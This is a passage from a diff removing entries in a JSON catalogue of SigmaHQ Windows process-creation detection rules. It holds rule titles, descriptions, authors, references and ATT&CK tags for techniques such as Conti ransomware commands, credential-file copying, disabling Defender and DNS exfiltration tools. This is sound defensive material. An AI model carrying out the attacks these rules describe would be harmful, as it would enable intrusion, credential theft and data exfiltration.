"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_computer_discovery_get_adcomputer.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033" - ] - }, - "uuid": "435e10e4-992a-4281-96f3-38b11106adde", - "value": "Computer Discovery And Export Via Get-ADComputer Cmdlet" - }, - { - "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/14", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_conhost_path_traversal.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://pentestlab.blog/2020/07/06/indirect-command-execution/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003" - ] - }, - "uuid": "ee5e119b-1f75-4b34-add8-3be976961e39", - "value": "Conhost.exe CommandLine Path Traversal" - }, - { - "description": "Conti ransomware command line ioc", - "meta": { - "author": "frack113", - "creation_date": "2021/10/12", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_conti_cmd_ransomware.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/", - "https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_cmd_ransomware.yml" - ], - "tags": [ - "attack.impact", - "attack.s0575", - "attack.t1486" - ] - }, - "uuid": "689308fc-cfba-4f72-9897-796c1dc61487", - "value": "Conti Ransomware Execution" - }, - { - "description": "Detects a command used by conti to dump database", - "meta": { - "author": "frack113", - "creation_date": "2021/08/16", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_conti_sqlcmd.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", - "https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_sqlcmd.yml" - ], - "tags": [ - "attack.collection", - "attack.t1005" - ] - }, - "uuid": "2f47f1fd-0901-466e-a770-3b7092834a1b", - "value": "Conti Backup Database" - }, - { - "description": "Detects the malicious use of a control panel item", - "meta": { - "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", - "creation_date": "2020/06/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_control_panel_item.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://attack.mitre.org/techniques/T1196/", - "https://ired.team/offensive-security/code-execution/code-execution-through-control-panel-add-ins", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_control_panel_item.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218.002", - "attack.persistence", - "attack.t1546" - ] - }, - "uuid": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", - "value": "Control Panel Items" - }, - { - "description": "Files with well-known filenames (sensitive files with credential data) copying", - "meta": { - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/22", - "falsepositive": [ - "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" - ], - "filename": "proc_creation_win_copying_sensitive_files_with_credential_data.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003", - "car.2013-07-001", - "attack.s0404" - ] - }, - "uuid": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", - "value": "Copying Sensitive Files with Credential Data" - }, - { - "description": "Detects usage of the copy command to copy files with the .dmp extensions from a remote share", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/27", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_copy_dmp_from_share.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_copy_dmp_from_share.yml" - ], - "tags": [ - "attack.credential_access" - ] - }, - "uuid": "044ba588-dff4-4918-9808-3f95e8160606", - "value": "Copy DMP Files From Share" - }, - { - "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_crackmapexec_patterns.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crackmapexec_patterns.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "f26307d8-14cd-47e3-a26b-4b4769f24af6", - "value": "CrackMapExec Process Patterns" - }, - { - "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", - "meta": { - "author": "Max Altgelt", - "creation_date": "2022/04/06", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_creative_cloud_node_abuse.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mttaggart/status/1511804863293784064", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_creative_cloud_node_abuse.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127", - "attack.t1059.007" - ] - }, - "uuid": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", - "value": "Node Process Executions" - }, - { - "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS", - "meta": { - "author": "Sreeman", - "creation_date": "2020/10/29", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_credential_access_via_password_filter.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/", - "https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_credential_access_via_password_filter.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1556.002" - ] - }, - "uuid": "b7966f4a-b333-455b-8370-8ca53c229762", - "value": "Dropping Of Password Filter DLL" - }, - { - "description": "Detects Credential Acquisition via Registry Hive Dumping", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/10/04", - "falsepositive": "No established falsepositives", - "filename": "proc_creation_win_credential_acquisition_registry_hive_dumping.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/credential-acquisition-via-registry-hive-dumping.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_credential_acquisition_registry_hive_dumping.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ] - }, - "uuid": "4d6c9da1-318b-4edf-bcea-b6c93fa98fd0", - "value": "Credential Acquisition via Registry Hive Dumping" - }, - { - "description": "Detects Archer malware invocation via rundll32", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/06/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_crime_fireball.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/", - "https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_fireball.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218.011" - ] - }, - "uuid": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", - "value": "Fireball Archer Install" - }, - { - "description": "Detects specific process characteristics of Maze ransomware word document droppers", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/05/08", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_crime_maze_ransomware.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", - "https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/", - "https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_maze_ransomware.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1047", - "attack.impact", - "attack.t1490" - ] - }, - "uuid": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", - "value": "Maze Ransomware" - }, - { - "description": "Detects specific process characteristics of Snatch ransomware word document droppers", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/08/26", - "falsepositive": [ - "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" - ], - "filename": "proc_creation_win_crime_snatch_ransomware.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_snatch_ransomware.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204" - ] - }, - "uuid": "5325945e-f1f0-406e-97b8-65104d393fff", - "value": "Snatch Ransomware" - }, - { - "description": "Detects command line parameters or strings often used by crypto miners", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/10/26", - "falsepositive": [ - "Legitimate use of crypto miners", - "Some build frameworks" - ], - "filename": "proc_creation_win_crypto_mining_monero.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.poolwatch.io/coin/monero", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crypto_mining_monero.yml" - ], - "tags": [ - "attack.impact", - "attack.t1496" - ] - }, - "uuid": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", - "value": "Windows Crypto Mining Indicators" - }, - { - "description": "Detects a curl process start on Windows, which indicates a file download from a remote location or a simple web request to a remote server", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/07/05", - "falsepositive": [ - "Scripts created by developers and admins", - "Administrative activity" - ], - "filename": "proc_creation_win_curl_download.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "bbeaed61-1990-4773-bf57-b81dbad7db2d", - "value": "Curl Usage on Windows" - }, - { - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/03/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_cve_2021_26857_msexchange.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cve_2021_26857_msexchange.yml" - ], - "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26857" - ] - }, - "uuid": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", - "value": "CVE-2021-26857 Exchange Exploitation" - }, - { - "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", - "meta": { - "author": "Timur Zinniatullin, E.M. Anhaus, oscd.community", - "creation_date": "2019/10/21", - "falsepositive": [ - "Highly likely if rar is a default archiver in the monitored environment." - ], - "filename": "proc_creation_win_data_compressed_with_rar.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_data_compressed_with_rar.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ] - }, - "uuid": "6f3e2987-db24-4c78-a860-b4f4095a7095", - "value": "Data Compressed - rar.exe" - }, - { - "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_delete_systemstatebackup.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_delete_systemstatebackup.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ] - }, - "uuid": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", - "value": "Wbadmin Delete Systemstatebackup" - }, - { - "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.HxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\". Its path includes a version number, e.g., \"C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\\HxTsr.exe\". Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe", - "meta": { - "author": "Sreeman", - "creation_date": "2020/04/17", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_detecting_fake_instances_of_hxtsr.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_detecting_fake_instances_of_hxtsr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ] - }, - "uuid": "4e762605-34a8-406d-b72e-c1a089313320", - "value": "Detecting Fake Instances Of Hxtsr.exe" - }, - { - "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that doesnt exist. This non-existent DLL file is named \"ShellChromeAPI.dll\". \nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "meta": { - "author": "@gott_cyber", - "creation_date": "2022/08/29", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_deviceenroller_evasion.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://mobile.twitter.com/0gtweet/status/1564131230941122561", - "https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_deviceenroller_evasion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "e173ad47-4388-4012-ae62-bd13f71c18a8", - "value": "DLL Sideloading via DeviceEnroller.exe" - }, - { - "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/12/07", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_dinjector.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/snovvcrash/DInjector", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dinjector.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055" - ] - }, - "uuid": "d78b5d61-187d-44b6-bf02-93486a80de5a", - "value": "DInject PowerShell Cradle CommandLine Flags" - }, - { - "description": "Detect use of DirLister.exe", - "meta": { - "author": "frack113", - "creation_date": "2022/08/20", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_dirlister.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1083/T1083.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dirlister.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083" - ] - }, - "uuid": "b4dc61f5-6cce-468e-a608-b48b469feaa2", - "value": "Launch DirLister Executable" - }, - { - "description": "Detects attackers attempting to disable Windows Defender using Powershell", - "meta": { - "author": "ok @securonix invrep-de, oscd.community, frack113", - "creation_date": "2020/10/12", - "falsepositive": [ - "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." - ], - "filename": "proc_creation_win_disable_defender_av_security_monitoring.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", - "https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_disable_defender_av_security_monitoring.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "a7ee1722-c3c5-aeff-3212-c777e4733217", - "value": "Disable Windows Defender AV Security Monitoring" - }, - { - "description": "Detects when attackers use \"sc.exe\" or the powershell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\"", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/01", - "falsepositive": [ - "Administrators settings a service to disable via script or cli for testing purposes" - ], - "filename": "proc_creation_win_disable_service.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_disable_service.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "85c312b7-f44d-4a51-a024-d671c40b49fc", - "value": "Sc Or Set-Service Cmdlet Execution to Disable Services" - }, - { - "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", - "meta": { - "author": "frack113", - "creation_date": "2021/07/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_discover_private_keys.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_discover_private_keys.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.004" - ] - }, - "uuid": "213d6a77-3d55-4ce8-ba74-fcfef741974e", - "value": "Discover Private Keys" - }, - { - "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2022/08/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_dll_sideload_defender.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dll_sideload_defender.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", - "value": "DLL Sideloading by Microsoft Defender" - }, - { - "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/02", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "ebea773c-a8f1-42ad-a856-00cb221966e8", - "value": "DLL Sideloading by VMware Xfer Utility" - }, - { - "description": "The PowerShell implementation of DNSCat2 calls nslookup to craft queries. Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally.", - "meta": { - "author": "Cian Heasley", - "creation_date": "2020/08/08", - "falsepositive": [ - "Other powershell scripts that call nslookup.exe" - ], - "filename": "proc_creation_win_dnscat2_powershell_implementation.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/lukebaggett/dnscat2-powershell", - "https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html", - "https://ragged-lab.blogspot.com/2020/06/it-is-always-dns-powershell-edition.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscat2_powershell_implementation.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071", - "attack.t1071.004", - "attack.t1001.003", - "attack.t1041" - ] - }, - "uuid": "b11d75d6-d7c1-11ea-87d0-0242ac130003", - "value": "DNSCat2 Powershell Implementation Detection Via Process Creation" - }, - { - "description": "Detects an attempt to add a potentially crafted DLL as a plug in of the DNS Service.\nDetects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain.\nDNS zones used to host the DNS records for a particular domain\n", - "meta": { - "author": "@gott_cyber", - "creation_date": "2022/07/31", - "falsepositive": [ - "Legitimate administration use" - ], - "filename": "proc_creation_win_dnscmd_discovery.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd", - "https://docs.microsoft.com/en-us/azure/dns/dns-zones-records", - "https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1543.003" - ] - }, - "uuid": "b6457d63-d2a2-4e29-859d-4e7affc153d1", - "value": "Discovery/Execution via dnscmd.exe" - }, - { - "description": "Well-known DNS Exfiltration tools execution", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate usage of iodine or dnscat2 — DNS Exfiltration tools (unlikely)" - ], - "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1132.001" - ] - }, - "uuid": "98a96a5a-64a0-4c42-92c5-489da3866cb0", - "value": "DNS Exfiltration and Tunneling Tools Execution" - }, - { - "description": "Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/05/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_dns_serverlevelplugindll.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_serverlevelplugindll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" - ] - }, - "uuid": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", - "value": "DNS ServerLevelPluginDll Install" - }, - { - "description": "dotnet.exe will execute any DLL and execute unsigned code", - "meta": { - "author": "Beyu Denis, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "System administrator Usage" - ], - "filename": "proc_creation_win_dotnet.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/", - "https://twitter.com/_felamos/status/1204705548668555264", - "https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dotnet.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ] - }, - "uuid": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", - "value": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN" - }, - { - "description": "Detects usage of Dsacls to grant over permissive permissions", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/20", - "falsepositive": [ - "Legitimate administrators granting over permissive permissions to users" - ], - "filename": "proc_creation_win_dsacls_abuse_permissions.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://ss64.com/nt/dsacls.html", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ] - }, - "uuid": "01c42d3c-242d-4655-85b2-34f1739632f7", - "value": "Abusing Permissions Using Dsacls" - }, - { - "description": "Detects possible password spraying attempts using Dsacls", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/20", - "falsepositive": [ - "Legitimate use of dsacls to bind to an LDAP session" - ], - "filename": "proc_creation_win_dsacls_password_spray.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone", - "https://ss64.com/nt/dsacls.html", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ] - }, - "uuid": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", - "value": "Password Spraying Attempts Using Dsacls" - }, - { - "description": "Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", - "meta": { - "author": "frack113", - "creation_date": "2022/01/16", - "falsepositive": [ - "Legitimate script" - ], - "filename": "proc_creation_win_dsim_remove.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism", - "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsim_remove.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "43e32da2-fdd0-4156-90de-50dfd62636f9", - "value": "Dism Remove Online Package" - }, - { - "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/06", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_dumpstack_log_evasion.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mrd0x/status/1479094189048713219", - 